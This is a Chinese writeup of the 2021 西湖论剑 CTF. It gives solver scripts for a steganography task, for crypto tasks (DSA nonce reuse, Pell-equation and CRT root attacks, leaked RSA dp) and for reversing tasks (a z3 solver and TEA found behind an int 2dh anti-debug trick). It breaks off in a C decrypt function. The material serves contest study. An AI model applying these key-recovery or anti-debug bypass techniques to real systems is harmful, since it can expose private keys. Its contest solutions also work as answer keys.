

    2021 西湖论剑 部分wp

    太难了!!!大部分都解不出,无限期更吧。。。

    misc

    真·签到

    签到

    YUSA的小秘密

    师弟发现用ste打开能看到flag,但是不完整,噪点太多了,然后就是查资料,查到一篇,https://cloud.tencent.com/developer/article/1841652,
    里面提到的字节的一个ctf,看了wp,发现能转为YCrCb,拆分3通道,这样噪点会减少,就能看到flag

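    import cv2   # `from cv2 import *` does not reliably bind the name `cv2` that is used below

    # imread returns None (it does not raise) when the file is missing or unreadable.
    img = cv2.imread('Yusa.png')
    if img is None:
        raise FileNotFoundError('Yusa.png could not be read')

    # Convert BGR -> YCrCb so luma and chroma land in separate planes; the
    # writeup found the flag far less noisy in the first (Y) plane than in RGB.
    ycrcb = cv2.cvtColor(img, cv2.COLOR_BGR2YCrCb)
    # cv2.split returns the planes in channel order Y, Cr, Cb (the original
    # called them r, g, b, which no longer matched the colour space).
    y_plane, cr_plane, cb_plane = cv2.split(ycrcb)

    # Keep only the least significant bit of each Y pixel and stretch it to
    # 0/255 so the bit plane is viewable as a black-and-white image.
    cv2.imwrite('r.png', (y_plane % 2) * 255)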
    

    Yusa的秘密

    取证,待复现

    二向化的flag

    未解出

    Global Noise

    未解出

    crypto

    密码人集合

    算是签到题吧,nc连上后,很像是一个数独的游戏,我猜想是把汉字和数字一一对应,然后解出来,将9个九方格的数字换为汉字输入,得到flag

    西湖论剑我要拿第一 分别对应:1 2 3 4 5 6 7 8 9
    

    解出数字后,写个脚本处理一下即可

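    # -*- coding: utf-8 -*-
    # The script is published as UTF-8 text; the original `# coding:gbk`
    # declaration only matched a GBK-saved copy and makes CPython fail to
    # decode the Chinese literals when the file is stored as UTF-8.

    # Sudoku cell value -> the character the service expects, following the
    # mapping 西湖论剑我要拿第一 = 1..9 given above.
    a = {1:'西',2:'湖',3:'论',4:'剑',5:'我',6:'要',7:'拿',8:'第',9:'一'}
    # The solved grid, row by row (81 digits).
    b = '214568793358479621796321854321859476594763182678412539642185937935247816187963245'
    # One print with no trailing newline, exactly what the original
    # per-character `print(..., end='')` loop emitted.
    print(''.join(a[int(digit)] for digit in b), end='')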
    

    unknown_dsa

    from Crypto.Util.number import *
    from Crypto.PublicKey import DSA
    from Crypto.Hash import SHA
    from gmpy2 import invert,powmod
    import random
    from secret import flag,m1,m2,ul,vl,wl
    
    def encrypt():
        """Generate DSA parameters and print signatures whose private keys are the two flag halves.

        Prints three lines: ``p*q, (p-1)//q, t`` / ``r1, s1, s2`` / ``r2, s3``.
        Two properties of this construction are what the solver below relies on:
        one nonce k is shared by all three signatures, and r2 is computed from
        x1 itself instead of from a nonce.
        """
        # Fresh 1024-bit DSA group; only the domain parameters p, q, g are used.
        key = DSA.generate(int(1024))
        p, q, g = key.p, key.q, key.g

        # Each half of the flag acts as a DSA private key, so it must be < q.
        half = len(flag) // 2
        x1 = bytes_to_long(flag[:half])
        x2 = bytes_to_long(flag[half:])
        assert x1<q and x2<q

        # Extra value printed together with p*q and (p-1)//q.
        t = powmod(g, p*q-(p+q), p*q)

        # SHA-1 digests of the two secret messages being "signed".
        hm1 = bytes_to_long(SHA.new(m1).digest())
        hm2 = bytes_to_long(SHA.new(m2).digest())

        # A single nonce drawn from Python's random module (not a CSPRNG),
        # reused for every signature below.
        k = random.randint(1, q-1)
        k_inv = invert(k, q)
        r1 = powmod(g, k, p) % q
        s1 = (hm1 + x1*r1) * k_inv % q
        s2 = (hm2 + x1*r1) * k_inv % q
        # The second r uses the private key x1 as the exponent.
        r2 = powmod(g, x1, p) % q
        s3 = (hm1 + x2*r2) * k_inv % q

        print(p*q, (p-1)//q, t, sep=', ')
        print(r1, s1, s2, sep=', ')
        print(r2, s3, sep=', ')
    
    def main():
        """Print the Pell-equation hints and the e=7 ciphertexts of m1 and m2, then run encrypt()."""
        # (ul[i], vl[i]) must solve the Pell equation u^2 - w*v^2 = 1 for
        # wl[i]; only wl is published, ul and vl stay secret.
        for i, u in enumerate(ul):
            assert u**2 - wl[i]* vl[i]**2==1

        e = 7
        # The same message raised to a small exponent under several moduli:
        # this is what lets the solver CRT-combine the values and take an
        # integer e-th root.
        msg1 = bytes_to_long(m1)
        msg2 = bytes_to_long(m2)
        cl1 = [int(powmod(msg1, e, modulus)) for modulus in ul]
        cl2 = [int(powmod(msg2, e, modulus)) for modulus in vl]
        print(wl, cl1, cl2, sep=', ')

        encrypt()
    
    if __name__ == '__main__':
        main()  # Pell/RSA hints first, then the DSA signatures (see encrypt)
    
    # Captured output of one run, in print order: line 1 = wl, cl1, cl2
    # (from main); line 2 = p*q, (p-1)//q, t; line 3 = r1, s1, s2;
    # line 4 = r2, s3 (from encrypt).  These are the solver's inputs below.
    '''
    [3912956711, 4013184893, 3260747771], [2852589223779928796266540600421678790889067284911682578924216186052590393595645322161563386615512475256726384365091711034449682791268994623758937752874750918200961888997082477100811025721898720783666868623498246219677221106227660895519058631965055790709130207760704, 21115849906180139656310664607458425637670520081983248258984166026222898753505008904136688820075720411004158264138659762101873588583686473388951744733936769732617279649797085152057880233721961, 301899179092185964785847705166950181255677272294377823045011205035318463496682788289651177635341894308537787449148199583490117059526971759804426977947952721266880757177055335088777693134693713345640206540670123872210178680306100865355059146219281124303460105424], [148052450029409767056623510365366602228778431569288407577131980435074529632715014971133452626021226944632282479312378667353792117133452069972334169386837227285924011187035671874758901028719505163887789382835770664218045743465222788859258272826217869877607314144, 1643631850318055151946938381389671039738824953272816402371095118047179758846703070931850238668262625444826564833452294807110544441537830199752050040697440948146092723713661125309994275256, 10949587016016795940445976198460149258144635366996455598605244743540728764635947061037779912661207322820180541114179612916018317600403816027703391110922112311910900034442340387304006761589708943814396303183085858356961537279163175384848010568152485779372842]
    85198615386075607567070020969981777827671873654631200472078241980737834438897900146248840279191139156416537108399682874370629888207334506237040017838313558911275073904148451540255705818477581182866269413018263079858680221647341680762989080418039972704759003343616652475438155806858735982352930771244880990190318526933267455248913782297991685041187565140859, 106239950213206316301683907545763916336055243955706210944736472425965200103461421781804731678430116333702099777855279469137219165293725500887590280355973107580745212368937514070059991848948031718253804694621821734957604838125210951711527151265000736896607029198, 60132176395922896902518845244051065417143507550519860211077965501783315971109433544482411208238485135554065241864956361676878220342500208011089383751225437417049893725546176799417188875972677293680033005399883113531193705353404892141811493415079755456185858889801456386910892239869732805273879281094613329645326287205736614546311143635580051444446576104548
    498841194617327650445431051685964174399227739376, 376599166921876118994132185660203151983500670896, 187705159843973102963593151204361139335048329243
    620827881415493136309071302986914844220776856282, 674735360250004315267988424435741132047607535029
    '''
    

    逆向思维,首先看到flag被拆为x1,x2,后面和x1,x2有关系的是hm1和hm2,hm1和hm2又和m1,m2有关系,最后m1,m2和cl1,cl2有关,并且已知,尝试能否求出

    看到 assert ul[i]**2 - wl[i]* vl[i]**2==1,联想可以用佩尔方程来解得到ul,vl,解出来后广播攻击可以得到m1,m2,然后可以得到hm1和hm2,p和q也可以通过已知条件求出,到此,所有的条件都已知,即可得到flag

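    def pell(n, numTry=1000):
        """Return the fundamental solution (u, v) of the Pell equation u^2 - n*v^2 = 1.

        The convergents of the continued fraction of sqrt(n) are scanned in
        order and the first (numerator, denominator) pair that satisfies the
        equation is returned, as Sage integers.

        Raises ValueError when no solution shows up among the first ``numTry``
        convergents.  (The original fell through to ``zip(ul, vl)`` on two
        integers, which raised an unrelated TypeError, or an UnboundLocalError
        when numTry was 0.)  n is assumed not to be a perfect square: then
        sqrt(n) is an integer, its continued fraction is finite and the
        equation has no nontrivial solution — TODO confirm how Sage's
        numerator()/denominator() behave past the end of a finite expansion.
        """
        cf = continued_fraction(sqrt(n))
        for i in range(numTry):
            u = cf.numerator(i)
            v = cf.denominator(i)
            if u**2 - n * v**2 == 1:
                return u, v
        raise ValueError(f"no solution of u^2 - {n}*v^2 = 1 among the first {numTry} convergents")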
    	
    			
    wl, cl1, cl2 = [3912956711, 4013184893, 3260747771], [2852589223779928796266540600421678790889067284911682578924216186052590393595645322161563386615512475256726384365091711034449682791268994623758937752874750918200961888997082477100811025721898720783666868623498246219677221106227660895519058631965055790709130207760704, 21115849906180139656310664607458425637670520081983248258984166026222898753505008904136688820075720411004158264138659762101873588583686473388951744733936769732617279649797085152057880233721961, 301899179092185964785847705166950181255677272294377823045011205035318463496682788289651177635341894308537787449148199583490117059526971759804426977947952721266880757177055335088777693134693713345640206540670123872210178680306100865355059146219281124303460105424], [148052450029409767056623510365366602228778431569288407577131980435074529632715014971133452626021226944632282479312378667353792117133452069972334169386837227285924011187035671874758901028719505163887789382835770664218045743465222788859258272826217869877607314144, 1643631850318055151946938381389671039738824953272816402371095118047179758846703070931850238668262625444826564833452294807110544441537830199752050040697440948146092723713661125309994275256, 10949587016016795940445976198460149258144635366996455598605244743540728764635947061037779912661207322820180541114179612916018317600403816027703391110922112311910900034442340387304006761589708943814396303183085858356961537279163175384848010568152485779372842]

    # Each published w gives one Pell equation; its fundamental solution
    # (u, v) is the (ul[i], vl[i]) pair the challenge used as RSA moduli.
    ul, vl = [], []
    for w in wl:
        u, v = pell(w)
        ul.append(u)
        vl.append(v)
    print(ul)
    print(vl)

    # m1^7 and m2^7 were reduced modulo three moduli each; CRT recombines the
    # residues.  The combined value is m^7 itself only if m^7 is smaller than
    # the product of the moduli — the integer root below exists exactly then.
    c1 = crt(cl1, ul)
    c2 = crt(cl2, vl)

    PR.<x> = PolynomialRing(ZZ)
    # Integer 7th root: the only integer root of x^7 - c over ZZ.
    m1 = int((x^7 - c1).roots()[0][0])
    m2 = int((x^7 - c2).roots()[0][0])
    print(m1)
    print(m2)
    

    得到flag的代码如下

    from gmpy2 import *
    from Crypto.Util.number import *
    from Crypto.Hash import SHA
    
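    pq,p_1_q = 85198615386075607567070020969981777827671873654631200472078241980737834438897900146248840279191139156416537108399682874370629888207334506237040017838313558911275073904148451540255705818477581182866269413018263079858680221647341680762989080418039972704759003343616652475438155806858735982352930771244880990190318526933267455248913782297991685041187565140859, 106239950213206316301683907545763916336055243955706210944736472425965200103461421781804731678430116333702099777855279469137219165293725500887590280355973107580745212368937514070059991848948031718253804694621821734957604838125210951711527151265000736896607029198
    # pq = p*q and p_1_q = (p-1)//q are both printed by the challenge, so
    # pq * p_1_q == p*(p-1).  Since (p-1)^2 <= p*(p-1) < p^2, the integer
    # square root of that product is exactly p-1, hence p = isqrt(...) + 1.
    # The original wrote `iroot(pq*p_1_q + 1//4, 2)[0] + 1//2`; in Python
    # `1//4` and `1//2` are both 0, so it silently produced p-1.  That went
    # unnoticed only because pq // (p-1) still rounds down to q (q < p-1)
    # and nothing below uses p itself.
    p = iroot(pq * p_1_q, 2)[0] + 1
    q = pq // p
    if p * q != pq:
        raise ValueError("recovered p and q do not multiply back to the published p*q")

    # m1, m2 as recovered by the Sage script above (CRT + integer 7th root).
    m1 = 8382905590662478666595114136929713707132131361720892331048437274828529226704174
    m2 = 10336852405630488944198347577475266693234960398137850045398990629116544863921454

    # The challenge hashed the raw message bytes with SHA-1 (Crypto.Hash.SHA).
    hm1 = bytes_to_long(SHA.new(long_to_bytes(m1)).digest())
    hm2 = bytes_to_long(SHA.new(long_to_bytes(m2)).digest())

    r1,s1,s2,r2,s3 = 498841194617327650445431051685964174399227739376,376599166921876118994132185660203151983500670896, 187705159843973102963593151204361139335048329243,620827881415493136309071302986914844220776856282,674735360250004315267988424435741132047607535029
    # s1 and s2 were made with the same nonce k and the same key x1, so
    # subtracting the two signature equations cancels x1*r1:
    #   s2 - s1 = (hm2 - hm1) * k^-1 (mod q)  =>  k = (hm2 - hm1) / (s2 - s1)
    k = (hm2 - hm1) * inverse(s2 - s1, q) % q
    # With k known each signature equation yields its private key directly;
    # s3 was also produced with k, so x2 follows the same way.
    x1 = (s2 * k - hm2) * inverse(r1, q) % q
    x2 = (s3 * k - hm1) * inverse(r2, q) % q

    print(long_to_bytes(x1) + long_to_bytes(x2))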
    

    hardrsa

    from Crypto.Util.number import *
    import gmpy2
    from secret import flag
    
    p = getPrime(512)
    q = getPrime(512)
    # Multi-power modulus: p appears to the fourth power.
    n = p**4 * q

    e = 65537
    # Private exponent taken modulo lcm(p-1, q-1) rather than (p-1)(q-1);
    # e*d is still 1 modulo p-1, which is what makes dp usable on its own.
    phi = gmpy2.lcm(p - 1, q - 1)
    d = gmpy2.invert(e, phi)
    # dp = d mod (p-1) is published: together with p it decrypts c modulo p.
    dp = d % (p - 1)
    m = bytes_to_long(flag)
    c = pow(m, e, n)
    print(f"dp = {dp}")
    print(f"c = {c}")

    # Second hint: a polynomial in p is leaked as the discrete logarithm of
    # c1 = g^x mod y.  The solver recovers x with sympy.discrete_log, which
    # presumably is only tractable because of how y was chosen — not shown here.
    y = 449703347709287328982446812318870158230369688625894307953604074502413258045265502496365998383562119915565080518077360839705004058211784369656486678307007348691991136610142919372779782779111507129101110674559235388392082113417306002050124215904803026894400155194275424834577942500150410440057660679460918645357376095613079720172148302097893734034788458122333816759162605888879531594217661921547293164281934920669935417080156833072528358511807757748554348615957977663784762124746554638152693469580761002437793837094101338408017407251986116589240523625340964025531357446706263871843489143068620501020284421781243879675292060268876353250854369189182926055204229002568224846436918153245720514450234433170717311083868591477186061896282790880850797471658321324127334704438430354844770131980049668516350774939625369909869906362174015628078258039638111064842324979997867746404806457329528690722757322373158670827203350590809390932986616805533168714686834174965211242863201076482127152571774960580915318022303418111346406295217571564155573765371519749325922145875128395909112254242027512400564855444101325427710643212690768272048881411988830011985059218048684311349415764441760364762942692722834850287985399559042457470942580456516395188637916303814055777357738894264037988945951468416861647204658893837753361851667573185920779272635885127149348845064478121843462789367112698673780005436144393573832498203659056909233757206537514290993810628872250841862059672570704733990716282248839

    g = 2
    x = 2021*p**4 + 2020*p**3 + 2019*p**2
    c1 = pow(g, x, y)
    print(f"c1 = {c1}")
    
    
    # dp = 379476973158146550831004952747643994439940435656483772269013081580532539640189020020958796514224150837680366977747272291881285391919167077726836326564473
    
    # c = 57248258945927387673579467348106118747034381190703777861409527336272914559699490353325906672956273559867941402281438670652710909532261303394045079629146156340801932254839021574139943933451924062888426726353230757284582863993227592703323133265180414382062132580526658205716218046366247653881764658891315592607194355733209493239611216193118424602510964102026998674323685134796018596817393268106583737153516632969041693280725297929277751136040546830230533898514659714717213371619853137272515967067008805521051613107141555788516894223654851277785393355178114230929014037436770678131148140398384394716456450269539065009396311996040422853740049508500540281488171285233445744799680022307180452210793913614131646875949698079917313572873073033804639877699884489290120302696697425
    
    # c1 = 78100131461872285613426244322737502147219485108799130975202429638042859488136933783498210914335741940761656137516033926418975363734194661031678516857040723532055448695928820624094400481464950181126638456234669814982411270985650209245687765595483738876975572521276963149542659187680075917322308512163904423297381635532771690434016589132876171283596320435623376283425228536157726781524870348614983116408815088257609788517986810622505961538812889953185684256469540369809863103948326444090715161351198229163190130903661874631020304481842715086104243998808382859633753938512915886223513449238733721777977175430329717970940440862059204518224126792822912141479260791232312544748301412636222498841676742208390622353022668320809201312724936862167350709823581870722831329406359010293121019764160016316259432749291142448874259446854582307626758650151607770478334719317941727680935243820313144829826081955539778570565232935463201135110049861204432285060029237229518297291679114165265808862862827211193711159152992427133176177796045981572758903474465179346029811563765283254777813433339892058322013228964103304946743888213068397672540863260883314665492088793554775674610994639537263588276076992907735153702002001005383321442974097626786699895993544581572457476437853778794888945238622869401634353220344790419326516836146140706852577748364903349138246106379954647002557091131475669295997196484548199507335421499556985949139162639560622973283109342746186994609598854386966520638338999059
    

    离散对数加上解方程是可以求出p,但是n并不知道,最开始想直接求q,但是求不出来,我们用已知条件尝试推导一下是否能求出明文

    已知
    dp = d mod (p - 1)
    c = m^e mod n
    
    引进参数dp,则有
    c^dp = m^(e*dp) mod n
    化简
    c^dp = m^(e*dp) mod p
    因为dp = d mod (p - 1)
    可再化简为
    c^dp = m^(e*d) mod p ******************1式子
    因为题中出现了
    phi = gmpy2.lcm(p - 1, q - 1)
    d = gmpy2.invert(e, phi)
    所以存在关系
    e*d = 1 mod lcm(p - 1, q - 1)
    即存在
    e*d = 1 mod p - 1,e*d = k(p-1)+1,代入1式子
    c^dp =  m^(k(p-1)+1) mod p
    c^dp = m·(m^(p-1))^k mod p ****************2式子
    费马小定理化简一下,2式子变为
    c^dp = m mod p
    
    综上:仅知道dp和p,是可以求出m的
    

    那么就是先求出前半部分即可,需要一段时间,我跑了12分钟(电脑废)

    import sympy
    from Crypto.Util.number import *
    
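    g = 2
    y = 449703347709287328982446812318870158230369688625894307953604074502413258045265502496365998383562119915565080518077360839705004058211784369656486678307007348691991136610142919372779782779111507129101110674559235388392082113417306002050124215904803026894400155194275424834577942500150410440057660679460918645357376095613079720172148302097893734034788458122333816759162605888879531594217661921547293164281934920669935417080156833072528358511807757748554348615957977663784762124746554638152693469580761002437793837094101338408017407251986116589240523625340964025531357446706263871843489143068620501020284421781243879675292060268876353250854369189182926055204229002568224846436918153245720514450234433170717311083868591477186061896282790880850797471658321324127334704438430354844770131980049668516350774939625369909869906362174015628078258039638111064842324979997867746404806457329528690722757322373158670827203350590809390932986616805533168714686834174965211242863201076482127152571774960580915318022303418111346406295217571564155573765371519749325922145875128395909112254242027512400564855444101325427710643212690768272048881411988830011985059218048684311349415764441760364762942692722834850287985399559042457470942580456516395188637916303814055777357738894264037988945951468416861647204658893837753361851667573185920779272635885127149348845064478121843462789367112698673780005436144393573832498203659056909233757206537514290993810628872250841862059672570704733990716282248839
    c1 = 78100131461872285613426244322737502147219485108799130975202429638042859488136933783498210914335741940761656137516033926418975363734194661031678516857040723532055448695928820624094400481464950181126638456234669814982411270985650209245687765595483738876975572521276963149542659187680075917322308512163904423297381635532771690434016589132876171283596320435623376283425228536157726781524870348614983116408815088257609788517986810622505961538812889953185684256469540369809863103948326444090715161351198229163190130903661874631020304481842715086104243998808382859633753938512915886223513449238733721777977175430329717970940440862059204518224126792822912141479260791232312544748301412636222498841676742208390622353022668320809201312724936862167350709823581870722831329406359010293121019764160016316259432749291142448874259446854582307626758650151607770478334719317941727680935243820313144829826081955539778570565232935463201135110049861204432285060029237229518297291679114165265808862862827211193711159152992427133176177796045981572758903474465179346029811563765283254777813433339892058322013228964103304946743888213068397672540863260883314665492088793554775674610994639537263588276076992907735153702002001005383321442974097626786699895993544581572457476437853778794888945238622869401634353220344790419326516836146140706852577748364903349138246106379954647002557091131475669295997196484548199507335421499556985949139162639560622973283109342746186994609598854386966520638338999059

    # The discrete logarithm x = log_g(c1) mod y took the author ~12 minutes
    # with sympy; the call is kept for reference and its result hard-coded.
    #p_f = sympy.discrete_log(y,c1,g)
    #print(p_f)

    p_f = 43776275628859890575232443794319298551934804213472744927022818696759188901977390266973172755658396197421139420206549889337117978597883154859965236605452518446448639813055134133587564045471804447818058571586426895800984805588363855865218690877547419152765512143095217413477343835473963637692441032136163289964756172316289469159500312630529091350636808491697553069388388303341623047737553556123142002737059936569931163197364571478509576816349348146215101250803826590694039096063858424405382950769415272111843039715632655831594224288099608827345377164375927559338153505991404973888594356664393487249819589915881178770048740
    c = 57248258945927387673579467348106118747034381190703777861409527336272914559699490353325906672956273559867941402281438670652710909532261303394045079629146156340801932254839021574139943933451924062888426726353230757284582863993227592703323133265180414382062132580526658205716218046366247653881764658891315592607194355733209493239611216193118424602510964102026998674323685134796018596817393268106583737153516632969041693280725297929277751136040546830230533898514659714717213371619853137272515967067008805521051613107141555788516894223654851277785393355178114230929014037436770678131148140398384394716456450269539065009396311996040422853740049508500540281488171285233445744799680022307180452210793913614131646875949698079917313572873073033804639877699884489290120302696697425
    dp = 379476973158146550831004952747643994439940435656483772269013081580532539640189020020958796514224150837680366977747272291881285391919167077726836326564473


    def _positive_integer_root(target):
        """Return the integer v > 0 with 2021*v^4 + 2020*v^3 + 2019*v^2 == target.

        The polynomial is strictly increasing for v > 0, so an exact integer
        bisection finds the root without floating point or a symbolic solver.
        The original used sympy.solve and took roots[0][0], relying on sympy
        putting the positive real root first among the four roots of the
        quartic (and rebinding the name `p` from Symbol to result list).
        Raises ValueError if target is not a value of the polynomial at a
        positive integer.
        """
        def poly(v):
            return 2021 * v**4 + 2020 * v**3 + 2019 * v**2

        lo, hi = 1, 1
        while poly(hi) < target:   # grow the bracket until poly(hi) >= target
            hi *= 2
        while lo < hi:             # smallest v with poly(v) >= target
            mid = (lo + hi) // 2
            if poly(mid) < target:
                lo = mid + 1
            else:
                hi = mid
        if poly(lo) != target:
            raise ValueError("target is not 2021*p^4 + 2020*p^3 + 2019*p^2 for any positive integer p")
        return lo


    p = _positive_integer_root(p_f)

    # c^dp == m (mod p): d was inverted modulo lcm(p-1, q-1), so e*dp == 1
    # (mod p-1) and c^dp == m^(e*dp) == m * (m^(p-1))^k == m (mod p) by
    # Fermat.  This recovers m in full only if m < p, i.e. the flag fits in
    # fewer than 512 bits.
    m = pow(c, dp, p)
    # Same bytes as Crypto's long_to_bytes(m) for m > 0, without the dependency.
    print(m.to_bytes((m.bit_length() + 7) // 8, 'big'))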
    

    FilterRandom

    未解出

    SpecialCurve2

    未解出

    WienerStudyTwice

    0解

    reverse

    ROP

    32位程序,无壳,ida分析,逻辑非常简单,我截取主要部分

     memset(&Dst, 0, 0x100u);
      memset(Buf2, 0, 0x100u);
      sub_401650("Input:");
      sub_4016A0("%40s", &Dst);
      if ( strlen(&Dst) != 40 )
        exit(0);
      for ( i = 0; i < 0x28; i += 8 )
      {
        for ( j = 0; j < 8; ++j )
        {
          v0 = ((*(&v2 + j) & *(&v16 + i)) << (8 - (3 - j) % 8u)) | ((*(&v2 + j) & (unsigned int)*(&v16 + i)) >> (3 - j) % 8u) | ((*(&v2 + j) & *(&v15 + i)) << (8 - (2 - j) % 8u)) | ((*(&v2 + j) & (unsigned int)*(&v15 + i)) >> (2 - j) % 8u) | ((*(&v2 + j) & *(&v14 + i)) << (8 - (1 - j) % 8u)) | ((*(&v2 + j) & (unsigned int)*(&v14 + i)) >> (1 - j) % 8u) | ((*(_BYTE *)(&v2 + j) & (unsigned __int8)*(&Dst + i)) << (8 - -j % 8u)) | ((*(&v2 + j) & (unsigned int)*(&Dst + i)) >> -j % 8u);
          Buf2[j + i] = byte_405000[(unsigned __int8)(((*(_BYTE *)(&v2 + j) & (unsigned __int8)v20[i]) << (8 - (7 - j) % 8u)) | ((*(&v2 + j) & (unsigned int)v20[i]) >> (7 - j) % 8u) | ((*(&v2 + j) & *(&v19 + i)) << (8 - (6 - j) % 8u)) | ((*(&v2 + j) & (unsigned int)*(&v19 + i)) >> (6 - j) % 8u) | ((*(&v2 + j) & *(&v18 + i)) << (8 - (5 - j) % 8u)) | ((*(&v2 + j) & (unsigned int)*(&v18 + i)) >> (5 - j) % 8u) | ((*(&v2 + j) & *(&v17 + i)) << (8 - (4 - j) % 8u)) | ((*(&v2 + j) & (unsigned int)*(&v17 + i)) >> (4 - j) % 8u) | v0)];
        }
      }
      if ( memcmp(&unk_405100, Buf2, 0x28u) )
      {
        puts("Wrong");
        exit(0);
      }
      puts("Congratulations");
      puts("flag is DASCTF{your input}");
    

    从中看出就是算法比较麻烦,但是最后的结果我们是已知的,稍微整理一下

    v0 = 
    	  ((*(&v2 + j) & *(flag+3 + i)) << (8 - (3 - j) % 8u)) | 
    	  ((*(&v2 + j) & *(flag+3 + i)) >> (3 - j) % 8u) |
    	  ((*(&v2 + j) & *(flag+2 + i)) << (8 - (2 - j) % 8u)) |
    	  ((*(&v2 + j) & *(flag+2 + i)) >> (2 - j) % 8u) |
    	  ((*(&v2 + j) & *(flag+1 + i)) << (8 - (1 - j) % 8u)) |
    	  ((*(&v2 + j) & *(flag+1 + i)) >> (1 - j) % 8u) |
    	  ((*(&v2 + j) & *(flag + i)) << (8 - -j % 8u)) |
    	  ((*(&v2 + j) & *(flag + i)) >> -j % 8u);
            
    Buf2[j + i] = byte_405000[
    	  ((*(&v2 + j) & *(flag+7 + i) << (8 - (7 - j) % 8u) |
    	  ((*(&v2 + j) & *(flag+7 + i) >> (7 - j) % 8u) |
    	  ((*(&v2 + j) & *(flag+6 + i)) << (8 - (6 - j) % 8u)) |
    	  ((*(&v2 + j) & *(flag+6 + i)) >> (6 - j) % 8u) |
    	  ((*(&v2 + j) & *(flag+5 + i)) << (8 - (5 - j) % 8u)) |
    	  ((*(&v2 + j) & *(flag+5 + i)) >> (5 - j) % 8u) |
    	  ((*(&v2 + j) & *(flag+4 + i)) << (8 - (4 - j) % 8u)) |
    	  ((*(&v2 + j) & *(flag+4 + i)) >> (4 - j) % 8u) |
    	  v0)];        
    

    z3解一下

    from z3 import *
    Buf2 = [0x65, 0x55, 0x24, 0x36, 0x9D, 0x71, 0xB8, 0xC8, 0x65, 0xFB, 0x87, 0x7F, 0x9A, 0x9C, 0xB1, 0xDF, 0x65, 0x8F, 0x9D, 0x39, 0x8F, 0x11, 0xF6, 0x8E, 0x65, 0x42, 0xDA, 0xB4, 0x8C, 0x39, 0xFB, 0x99, 0x65, 0x48, 0x6A, 0xCA, 0x63, 0xE7, 0xA4, 0x79]
    byte_405000 = [0x65, 0x08, 0xF7, 0x12, 0xBC, 0xC3, 0xCF, 0xB8, 0x83, 0x7B, 0x02, 0xD5, 0x34, 0xBD, 0x9F, 0x33, 0x77, 0x76, 0xD4, 0xD7, 0xEB, 0x90, 0x89, 0x5E, 0x54, 0x01, 0x7D, 0xF4, 0x11, 0xFF, 0x99, 0x49, 0xAD, 0x57, 0x46, 0x67, 0x2A, 0x9D, 0x7F, 0xD2, 0xE1, 0x21, 0x8B, 0x1D, 0x5A, 0x91, 0x38, 0x94, 0xF9, 0x0C, 0x00, 0xCA, 0xE8, 0xCB, 0x5F, 0x19, 0xF6, 0xF0, 0x3C, 0xDE, 0xDA, 0xEA, 0x9C, 0x14, 0x75, 0xA4, 0x0D, 0x25, 0x58, 0xFC, 0x44, 0x86, 0x05, 0x6B, 0x43, 0x9A, 0x6D, 0xD1, 0x63, 0x98, 0x68, 0x2D, 0x52, 0x3D, 0xDD, 0x88, 0xD6, 0xD0, 0xA2, 0xED, 0xA5, 0x3B, 0x45, 0x3E, 0xF2, 0x22, 0x06, 0xF3, 0x1A, 0xA8, 0x09, 0xDC, 0x7C, 0x4B, 0x5C, 0x1E, 0xA1, 0xB0, 0x71, 0x04, 0xE2, 0x9B, 0xB7, 0x10, 0x4E, 0x16, 0x23, 0x82, 0x56, 0xD8, 0x61, 0xB4, 0x24, 0x7E, 0x87, 0xF8, 0x0A, 0x13, 0xE3, 0xE4, 0xE6, 0x1C, 0x35, 0x2C, 0xB1, 0xEC, 0x93, 0x66, 0x03, 0xA9, 0x95, 0xBB, 0xD3, 0x51, 0x39, 0xE7, 0xC9, 0xCE, 0x29, 0x72, 0x47, 0x6C, 0x70, 0x15, 0xDF, 0xD9, 0x17, 0x74, 0x3F, 0x62, 0xCD, 0x41, 0x07, 0x73, 0x53, 0x85, 0x31, 0x8A, 0x30, 0xAA, 0xAC, 0x2E, 0xA3, 0x50, 0x7A, 0xB5, 0x8E, 0x69, 0x1F, 0x6A, 0x97, 0x55, 0x3A, 0xB2, 0x59, 0xAB, 0xE0, 0x28, 0xC0, 0xB3, 0xBE, 0xCC, 0xC6, 0x2B, 0x5B, 0x92, 0xEE, 0x60, 0x20, 0x84, 0x4D, 0x0F, 0x26, 0x4A, 0x48, 0x0B, 0x36, 0x80, 0x5D, 0x6F, 0x4C, 0xB9, 0x81, 0x96, 0x32, 0xFD, 0x40, 0x8D, 0x27, 0xC1, 0x78, 0x4F, 0x79, 0xC8, 0x0E, 0x8C, 0xE5, 0x9E, 0xAE, 0xBF, 0xEF, 0x42, 0xC5, 0xAF, 0xA0, 0xC2, 0xFA, 0xC7, 0xB6, 0xDB, 0x18, 0xC4, 0xA6, 0xFE, 0xE9, 0xF5, 0x6E, 0x64, 0x2F, 0xF1, 0x1B, 0xFB, 0xBA, 0xA7, 0x37, 0x8F]
    # Single-bit masks, most significant bit first: key[j] selects bit 7-j.
    key = [128,64,32,16,8,4,2,1]

    # One 8-bit unknown per input byte; the binary requires exactly 40 characters.
    flag = [BitVec(f"flag[{i}]", 8) for i in range(40)]


    def _bit_term(byte, j, off):
        """Symbolic form of one `<<`/`>>` term pair from the decompiled loop.

        Keeps bit key[j] of `byte` and rotates it by (off - j) mod 8, written
        as the same (<< (8 - r)) | (>> r) pair the binary uses so the
        constraint is identical (a shift by 8 on an 8-bit value is 0 in both).
        """
        sel = key[j] & byte
        r = (off - j) % 8
        return (sel << (8 - r)) | (sel >> r)


    s = Solver()
    for i in range(0, 0x28, 8):
        for j in range(8):
            # v0 in the decompilation gathers one bit from each of flag[i..i+3];
            # the second group does the same for flag[i+4..i+7].  Their OR,
            # looked up in byte_405000, must equal the expected output byte.
            low_half = (_bit_term(flag[i + 3], j, 3) | _bit_term(flag[i + 2], j, 2)
                        | _bit_term(flag[i + 1], j, 1) | _bit_term(flag[i], j, 0))
            high_half = (_bit_term(flag[i + 7], j, 7) | _bit_term(flag[i + 6], j, 6)
                         | _bit_term(flag[i + 5], j, 5) | _bit_term(flag[i + 4], j, 4))
            s.add((low_half | high_half) == byte_405000.index(Buf2[i + j]))
    assert s.check() == sat
    m = s.model()

    print(''.join(chr(m[v].as_long()) for v in flag))
    

    gghdl

    未解出

    TacticalArmed

    ida分析没发现什么,后面突然看到存在一个tls回调函数

    跟进StartAddress函数

    发现int 2dh,这个是个反调试,在调试的时候不会去抛出异常,正常执行的时候抛出异常,也就是说需要抛出异常才是正常情况,可能那里藏了什么,跟踪一下

    看到数组赋值了四个值,我将int 2dh改为int 3,动态调试发现很奇怪的地方

    跟进后发现每次循环,里面的指令都不一样,这里应该是一个动态解码的过程,多条指令分析这个算法应该为tea算法,确定delta为0x81A5692e

    写解密算法脚本

    #include <stdint.h>
    #include <stdio.h>
    #include <string.h>
    
    void decrypt(uint32_t* v, uint32_t* k,int z) {
